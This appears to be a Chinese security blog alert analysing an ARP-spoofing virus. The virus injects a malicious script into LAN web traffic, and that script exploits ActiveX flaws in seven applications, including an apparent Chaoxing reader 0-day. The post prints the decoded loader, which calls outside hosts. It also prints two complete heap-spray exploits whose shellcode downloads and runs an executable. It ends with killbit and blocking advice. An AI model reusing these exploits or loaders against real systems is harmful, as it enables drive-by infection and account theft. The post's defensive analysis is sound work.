ARP病毒携新应用软件漏洞
病毒预警:ARP病毒携新应用软件漏洞(联众游戏、超星阅读器 0-Day)大肆传播
近期,根据恶意代码检测,有一新的ARP病毒变种,利用新的应用软件漏洞(联众游戏了聊天室组件、超星阅读器0-Day)大肆传播,造成内网断网,帐号丢失。
该新ARP病毒变种,通过感染局域网中一台后,会将该电脑伪装成网关,这样局域网中其它电脑在浏览网页的时候,其返回的WEB页面中插入恶意网址连接:<script src=http://rb.vg/1.js></script> ,该恶意网址连接利用多个时下流行的网页木马漏洞,下载多款网游木马,这样导致中毒用户帐号丢失,遭受到损失。
图:ARP病毒插入的恶意代码框架
详细分析如下:
恶意网址连接:<script src=http://rb.vg/1.js></script> 采用的是js文件挂马法,该文件采用16进制代码加密,解密后的代码如下:
/*----------------------------------------------------
var vDA1 = new window["Date"]()
vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)
var eOTo$2 = new window["String"](window["document"]["cookie"])
var eZT3 = "Cookie1="
var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)
if (VMliYvVKu4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()
try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="
http://nop.gs/s3...Js1.js"></script>');}catch(e){} // ms06014
try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...ok.gif"></iframe>');}catch(e){} // XL
try{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s3...68.gif"></iframe>');}catch(e){} // BF
try{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s3...8.gif"></iframe>');}catch(e){} // PPS
try{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s368...368.gif"></iframe>');}catch(e){} // CX
try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // LZ
try{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // Baidu
}
/*----------------------------------------------------
在该代码中,共利用以下7个漏洞下载木马病毒
http://pic.16.vg/S...82.exems06014 /经典的MS06-014挂马王漏洞
XL /迅雷5漏洞
BF /暴风影音漏洞
PPS /PPStream 漏洞
CX /超星阅读器漏洞 0-Day
LZ /联众游戏聊天室组件漏洞
Baidu /百度搜霸漏洞
下面说一下联众游戏聊天室组件漏洞和超星阅读器漏洞(0-Day) ,
http://nop.gs/s36...68.gif 是联众游戏聊天室组件的溢出代码,采用US-ASCii 加密,解密后的Exploits代码如下:
/**************************************************************************************************
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var fsk51d2sl = "63e23c122";
var bigblock = unescape(""+""+"%u9090"+""+"%u9090");
var fsk51d2sl = "63e23c122";
var headersize = 20;
var fsk51d2sl = "63e23c122";
var slackspace = headersize+shellcode.length;
var fsk51d2sl = "63e23c122";
while (bigblock.length<slackspace) bigblock+=bigblock;
var fsk51d2sl = "63e23c122";
fillblock = bigblock.substring(0, slackspace);
var fsk51d2sl = "63e23c122";
block = bigblock.substring(0, bigblock.length-slackspace);
var fsk51d2sl = "63e23c122";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var fsk51d2sl = "63e23c122";
memory = new Array();
var fsk51d2sl = "63e23c122";
for (x=0; x<300; x++) memory[x] = block +shellcode;
var fsk51d2sl = "63e23c122";
var buffer = ''
var fsk51d2sl = "63e23c122";
while (buffer.length < 164) buffer+="A";
var fsk51d2sl = "63e23c122";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
var fsk51d2sl = "63e23c122";
ok="ok";
var fsk51d2sl = "63e23c122";
target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );
var fsk51d2sl = "63e23c122";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />
/**************************************************************************************************
有漏洞的组件为:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink
其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69
下载的病毒为:
http://pic.16.vg/S...82.exe超星阅读器的Exploits代码如下,这个看样子现在还是个0-Day
/**************************************************************************************************
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e%ufb03"+""+""+"%u4e8b%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b"+""+""+"%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300"+""+""+"%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var bigblock = unescape(""+""+""+"%u9090"+""+""+"%u9090");
var el1s2kdo3r = "hi1265369";
var headersize = 20;
var el1s2kdo3r = "hi1265369";
var slackspace = headersize+shellcode.length;
var el1s2kdo3r = "hi1265369";
while (bigblock.length<slackspace) bigblock+=bigblock;
var el1s2kdo3r = "hi1265369";
fillblock = bigblock.substring(0, slackspace);
var el1s2kdo3r = "hi1265369";
block = bigblock.substring(0, bigblock.length-slackspace);
var el1s2kdo3r = "hi1265369";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var el1s2kdo3r = "hi1265369";
memory = new Array();
var el1s2kdo3r = "hi1265369";
for (x=0; x<100; x++) memory[x] = block +shellcode;
var el1s2kdo3r = "hi1265369";
var buffer = ''
var el1s2kdo3r = "hi1265369";
while (buffer.length < 1024) buffer+="\x05";
var el1s2kdo3r = "hi1265369";
var ok="1111";
var el1s2kdo3r = "hi1265369";
target.Register(ok,buffer);
var el1s2kdo3r = "hi1265369";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />
/**************************************************************************************************
有漏洞的组件为:C:\WINDOWS\system32\pdg2.dll
其CLSID:7F5E27CE-4A5C-11D3-9232-0000B48A05B2
下载的病毒同上个一样。
这回就连超星阅读器漏洞就被病毒作者利用上了,令我很是汗了一把~
请网管封杀
http://pic....vg/ 恶意网址,并将这些应用软件升级到最新版。
对于官方还没更新软件的0-Day漏洞,可以在注册表中设置killbit :
如超星阅读器的: 从最开始的MS06-014和MS07-017双漏洞挂马,到后来又加上了WEB迅雷漏洞三挂马法,再到时下十分流行的N个应用软件漏洞挂马,可见病毒作者为了将自己的马儿放出去,已经无所不用其极,下一个遭殃的软件会是那个呢?
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}]
"Compatibility Flags"=dword:00000400
近期网马漏洞不完全总结
百度搜霸ActiveX控件远程代码执行漏洞
PPStream 堆栈溢出漏洞
暴风影音2 mps.dll组件多个缓冲区溢出漏洞
jetAudio 7.x ActiveX漏洞
WEB迅雷漏洞
迅雷5漏洞
Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞
超星阅读器漏洞
联众游戏聊天室组件漏洞
From:网络巡警的博客
